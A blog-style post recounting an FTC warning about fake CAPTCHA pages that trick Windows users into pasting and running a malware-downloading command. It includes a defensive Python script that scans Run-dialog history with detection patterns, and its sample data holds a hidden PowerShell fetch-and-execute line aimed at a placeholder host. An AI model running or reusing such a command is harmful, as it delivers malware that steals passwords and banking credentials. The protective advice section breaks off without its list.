The CAPTCHA That Isn't

The FTC warned about fake CAPTCHA requests that look legit but actually install malware on your computer, because apparently security theater needed method acting

The Federal Trade Commission is reporting phishing scams that mimic CAPTCHA verification screens and trick people into running hidden commands that download malware to steal passwords and banking credentials.

What Happened

The FTC is getting reports about a new phishing scam that looks almost identical to the CAPTCHA requests people see all the time online. Real CAPTCHAs give you image or text-based tasks: type letters and numbers, match pictures of fire hydrants, that kind of thing. The fake CAPTCHA scams are different. They tell you to run keyboard commands on your computer, like "Windows + R," then "Ctrl + V," then "Enter." Those three keystrokes open the Windows Run dialog, paste whatever the fake page quietly copied to your clipboard when you clicked "verify," and execute it.

Once you run those commands, you've just pasted and executed a hidden command that the scammers placed on your clipboard, and that command downloads the malware. Now they have access to your email login data, mobile banking credentials, saved passwords, cryptocurrency wallets, and anything else they can grab from your browser before you notice something's wrong.
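One place the pasted command leaves a trace is the Run dialog's own history: on Windows, everything typed into Win+R is recorded under the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The script below is an added example, not code from the FTC alert or from this post. It triages RunMRU entries for the shape of a fake-CAPTCHA command (a script interpreter or downloader, a network fetch, window hiding or encoding). The sample entries, the example.invalid URL and the "lure text" heuristic (a trailing comment mimicking the CAPTCHA wording) are assumptions of the example, not details taken from the alert.

```python
"""Triage Windows Run-dialog history (RunMRU) for fake-CAPTCHA style commands.

Example code, not from the FTC alert. A fake CAPTCHA page puts a command on the
clipboard and has the victim press Win+R, Ctrl+V, Enter; what was pasted is kept
under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU.
"""
import re
from dataclasses import dataclass, field

# Interpreters and downloaders a one-line "verification" command leans on.
LAUNCHERS = re.compile(
    r"\b(powershell|pwsh|mshta|cmd|wscript|cscript|curl|certutil|bitsadmin|regsvr32|rundll32)\b",
    re.IGNORECASE,
)
# Evidence the command reaches out to the network or runs what it fetched.
REMOTE_FETCH = re.compile(
    r"(https?://|downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|"
    r"\birm\b|invoke-expression|\biex\b|start-bitstransfer|urlcache)",
    re.IGNORECASE,
)
# Hiding the window or encoding the payload so the victim sees as little as possible.
CONCEALMENT = re.compile(
    r"(-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-e\s+[A-Za-z0-9+/=]{20,}|frombase64string|-nop\b|-noprofile\b)",
    re.IGNORECASE,
)
# Assumption of this example: the lure wording sometimes rides along as a trailing
# comment so the pasted line "looks like" the CAPTCHA the victim was shown.
LURE_TEXT = re.compile(r"(captcha|not a robot|verification id|verify you are human)", re.IGNORECASE)


@dataclass
class Finding:
    command: str
    score: int
    reasons: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # "cmd" or "notepad" alone is normal; launcher plus fetch/concealment is not.
        return self.score >= 2


def strip_runmru_suffix(raw: str) -> str:
    # RunMRU stores each value as "<command>\1"; drop that marker.
    return raw[:-2] if raw.endswith("\\1") else raw


def classify_run_entry(raw: str) -> Finding:
    cmd = strip_runmru_suffix(raw)
    f = Finding(command=cmd, score=0)
    for label, pattern in (("launcher", LAUNCHERS), ("remote_fetch", REMOTE_FETCH),
                           ("concealment", CONCEALMENT), ("lure_text", LURE_TEXT)):
        if pattern.search(cmd):
            f.score += 1
            f.reasons.append(label)
    return f


def scan_runmru(entries: dict) -> list:
    """entries: {value_name: value_data} from the RunMRU key. Returns suspicious
    findings, most suspicious first; the MRUList ordering value is skipped."""
    findings = [classify_run_entry(v) for k, v in entries.items() if k != "MRUList"]
    return sorted((f for f in findings if f.suspicious), key=lambda f: -f.score)


def read_live_runmru():
    """On Windows, read the real key; elsewhere return None so the sample is used."""
    try:
        import winreg  # Windows only
    except ImportError:
        return None
    entries, i = {}, 0
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER,
                        r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU") as key:
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            entries[name], i = data, i + 1
    return entries


# Constructed sample of what the key might hold; URL and host are placeholders.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -nop -c "iex (iwr https://example.invalid/v.txt)" '
         '# I am not a robot - Verification ID: 7\\1',
}

if __name__ == "__main__":
    for f in scan_runmru(read_live_runmru() or SAMPLE_RUNMRU):
        print(f"[{f.score}] {f.command}\n     reasons: {', '.join(f.reasons)}")
```

Run it on a machine right after a suspicious "verification" prompt and anything it flags is the exact line the victim executed, which is also what you hand to whoever does the cleanup. Clearing the history is not a fix; the command has already run.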

Why This Matters

CAPTCHAs exist to prove you're human. Most people have learned not to trust unexpected pop-ups. But a CAPTCHA screen? That looks official. That looks like normal internet. And when the scammer's message says "security verification," it doesn't feel like a trap—it feels like routine web maintenance.

The genius of the scam is that it exploits muscle memory. You're used to clicking through CAPTCHAs without really thinking about it. So a CAPTCHA that asks for a tiny bit more interaction, just a few keystrokes, doesn't trigger the alarm in your brain that it should.

The Dumb Part With The Fake Proof

The dumb part is that legitimate websites and services have spent decades teaching people that CAPTCHAs are safe, boring security checks that prove you're human. That trust is now a vulnerability. Real CAPTCHAs never ask you to run commands on your device. Ever. But because people have been trained not to question them, a scammer can just copy the aesthetic and add one dangerous step.

If a CAPTCHA asks you to paste a command or run software, that's not a CAPTCHA. That's a social-engineering attack wearing a CAPTCHA costume: the scammer can't run code on your machine from a web page, so the "verification" step gets you to do it for them.

How to Protect Yourself

The FTC says to remember: real CAPTCHAs never ask you to run commands on your computer. If you see a CAPTCHA that does, or if you notice something downloading after you respond to one, act quickly:

The Bottom Line

The real stupid shit is that we've created a world where the most common, trusted-looking security check on the internet is now a viable vector for malware delivery. When a CAPTCHA that looks like a CAPTCHA can steal your banking credentials, we have a fundamental trust problem. The scammer wins because they borrowed an existing expectation. The internet loses because another everyday thing is now something to be paranoid about.

Sources

FTC Consumer Alert: How to spot a CAPTCHA scam

FTC: Malware — How to Protect Against, Detect, and Remove It

FTC: Report Fraud
